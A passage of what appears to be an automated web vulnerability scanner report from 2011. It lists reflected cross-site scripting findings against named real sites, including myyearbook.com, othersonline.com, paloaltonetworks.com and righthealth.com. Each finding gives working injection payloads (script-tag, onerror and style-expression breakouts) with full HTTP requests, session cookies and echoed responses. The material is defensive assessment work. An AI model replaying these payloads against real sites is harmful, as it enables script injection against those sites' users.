Content-Length: 888
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.212

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddSlot("ca-pub-8250125438595222", "Default_TribalFusion_MYB_728x90301ff</script><script>alert(1)</script>e2929316508_None_Network");
</script>
...[SNIP]...

3.102. http://www.myyearbook.com/advertising/default.php [sub parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.myyearbook.com
Path:	/advertising/default.php

Issue detail

The value of the sub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47ba1</script><script>alert(1)</script>6c9fe22fa6a was submitted in the sub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network47ba1</script><script>alert(1)</script>6c9fe22fa6a HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:42 GMT
Server: Apache
X-Server-Name: web59
Content-Length: 888
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.128

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...
<script type="text/javascript">
GA_googleAddSlot("ca-pub-8250125438595222", "Default_TribalFusion_MYB_728x90_None_Network47ba1</script><script>alert(1)</script>6c9fe22fa6a");
</script>
...[SNIP]...

3.103. http://www.othersonline.com/partner/scripts/myyearbook/page_parser.js [d parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.othersonline.com
Path:	/partner/scripts/myyearbook/page_parser.js

Issue detail

The value of the d request parameter is copied into a JavaScript inline comment. The payload a7303*/alert(1)//69ec540a16f was submitted in the d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /partner/scripts/myyearbook/page_parser.js?d=games.myyearbook.coma7303*/alert(1)//69ec540a16f HTTP/1.1
Host: www.othersonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cd=false

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Cache-control: private
Content-Type: text/javascript;charset=UTF-8
Date: Thu, 21 Jul 2011 18:01:56 GMT
Expires: Thu, 21 Jul 2011 19:01:56 GMT
Last-Modified: Thu, 21 Jul 2011 18:01:56 GMT
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server: TRP Apache-Coyote/1.1
Set-Cookie: cd=false; path=/; domain=.othersonline.com; expires=Wed, 16-Apr-2014 18:01:56 GMT
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 17452

/*! Copyright 2009,2010 Others Online Inc. All Rights Reserved. No permission is granted to use, copy or extend this code */

/*
The requested resource (/oz/scripts/domains/myyearbook.coma7303*/alert(1)//69ec540a16f/page_parser_hooks.js) is not available
*/

function oz_trim(A){return A.replace(/^\s+|\s+$/g,"");}function PageParser(){this.timeout=2000;this.doc=document;this.stopwords=null;this.init=function(
...[SNIP]...

3.104. http://www.paloaltonetworks.com/cam/switch/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.paloaltonetworks.com
Path:	/cam/switch/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdde1"><script>alert(1)</script>3e7c90a48f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cam/switch/index.php?ts=scmag&bdde1"><script>alert(1)</script>3e7c90a48f6=1 HTTP/1.1
Host: www.paloaltonetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: X-Mapping-mkmfjdci=CCDCC4EE41D6AB1FEC3D09C002EBB5F8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Fri, 22 Jul 2011 20:15:22 GMT
Connection: Keep-Alive
Content-Length: 8296

<!DOCTYPE html>

<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <meta name="generator" content="Dreamweaver">
   <meta name="author" content="C. W. Miller
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.paloaltonetworks.com/cam/switch/index.php?ts=scmag&bdde1"><script>alert(1)</script>3e7c90a48f6=1" title="Facebook" target="_blank">
...[SNIP]...

3.105. http://www.paloaltonetworks.com/cam/switch/index.php [ts parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.paloaltonetworks.com
Path:	/cam/switch/index.php

Issue detail

The value of the ts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27e3d"><script>alert(1)</script>1d3ace0c8b0 was submitted in the ts parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cam/switch/index.php?ts=scmag27e3d"><script>alert(1)</script>1d3ace0c8b0 HTTP/1.1
Host: www.paloaltonetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: X-Mapping-mkmfjdci=CCDCC4EE41D6AB1FEC3D09C002EBB5F8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Fri, 22 Jul 2011 20:15:11 GMT
Connection: Keep-Alive
Content-Length: 8287

<!DOCTYPE html>

<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <meta name="generator" content="Dreamweaver">
   <meta name="author" content="C. W. Miller
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.paloaltonetworks.com/cam/switch/index.php?ts=scmag27e3d"><script>alert(1)</script>1d3ace0c8b0" title="Facebook" target="_blank">
...[SNIP]...

3.106. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.righthealth.com
Path:	/external/ads/clo.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5df8d"><a>fbb1b57e20d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /external5df8d"><a>fbb1b57e20d/ads/clo.gif?pvid=1331858988&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx&cache=1311276207557 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992; NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:27:24 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external5df8d%22%3E%3Ca%3Efbb1b57e20d; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:27:24 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:42:24 GMT;path=/
Content-Length: 20417

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.righthealth.com/external5df8d"><a>fbb1b57e20d/ads/clo.gif"/>
...[SNIP]...

3.107. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.righthealth.com
Path:	/external/ads/clo.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee87a"><script>alert(1)</script>dca7ddc88f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /externalee87a"><script>alert(1)</script>dca7ddc88f2/ads/clo.gif?pvid=1617684726&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&cache=1311276182032 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:25:47 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=externalee87a%22%3E%3Cscript%3Ealert%281%29%3C; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:25:47 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:40:47 GMT;path=/
Content-Length: 20802

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.righthealth.com/externalee87a"><script>alert(1)</script>dca7ddc88f2/ads/clo.gif"/>
...[SNIP]...

3.108. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.righthealth.com
Path:	/external/ads/clo.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20110"%20onerror%3dalert(1)%20b0a6ae9eaae was submitted in the REST URL parameter 2. This input was echoed as 20110" onerror=alert(1) b0a6ae9eaae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /external/ads20110"%20onerror%3dalert(1)%20b0a6ae9eaae/clo.gif?pvid=1331858988&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx&cache=1311276207557 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992; NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:28:17 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:28:17 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:43:17 GMT;path=/
Content-Length: 20672

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Ads20110" Onerror=alert(1) B0a6ae9eaae clo.gif" />
...[SNIP]...

3.109. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.righthealth.com
Path:	/external/ads/clo.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8c41"style%3d"x%3aexpression(alert(1))"ae3298a1aff was submitted in the REST URL parameter 2. This input was echoed as a8c41"style="x:expression(alert(1))"ae3298a1aff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /external/adsa8c41"style%3d"x%3aexpression(alert(1))"ae3298a1aff/clo.gif?pvid=1617684726&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&cache=1311276182032 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:26:19 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:26:19 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:41:19 GMT;path=/
Content-Length: 20992

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Adsa8c41"style="x:expression(alert(1))"ae3298a1aff clo.gif" />
...[SNIP]...

3.110. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.righthealth.com
Path:	/external/ads/clo.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b0a12<x%20style%3dx%3aexpression(alert(1))>0f286142cd1 was submitted in the REST URL parameter 2. This input was echoed as b0a12<x style=x:expression(alert(1))>0f286142cd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /external/b0a12<x%20style%3dx%3aexpression(alert(1))>0f286142cd1/clo.gif?pvid=1331858988&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx&cache=1311276207557 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992; NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:28:46 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:28:46 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:43:46 GMT;path=/
Content-Length: 20774

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<strong>B0a12<x Style=x:expression(alert(1))>0f286142cd1</strong>
...[SNIP]...

3.111. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.righthealth.com
Path:	/external/ads/clo.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fce10<a>d35bf455d71 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /external/ads/clo.giffce10<a>d35bf455d71?pvid=1617684726&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&cache=1311276182032 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:27:18 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:27:18 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:42:18 GMT;path=/
Content-Length: 20658

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<span>One sec... we're building clo.giffce10<a>d35bf455d71 for <strong>
...[SNIP]...

3.112. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.righthealth.com
Path:	/external/ads/clo.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eb54"><script>alert(1)</script>21b545085de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /external/ads/clo.gif4eb54"><script>alert(1)</script>21b545085de?pvid=1617684726&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&cache=1311276182032 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:26:58 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:26:58 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:41:58 GMT;path=/
Content-Length: 20756

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.righthealth.com/external/ads/clo.gif4eb54"><script>alert(1)</script>21b545085de"/>
...[SNIP]...

3.113. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.righthealth.com
Path:	/external/ads/clo.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2112e"style%3d"x%3aexpression(alert(1))"2aaa2fd7024 was submitted in the REST URL parameter 3. This input was echoed as 2112e"style="x:expression(alert(1))"2aaa2fd7024 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /external/ads/clo.gif2112e"style%3d"x%3aexpression(alert(1))"2aaa2fd7024?pvid=1331858988&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx&cache=1311276207557 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
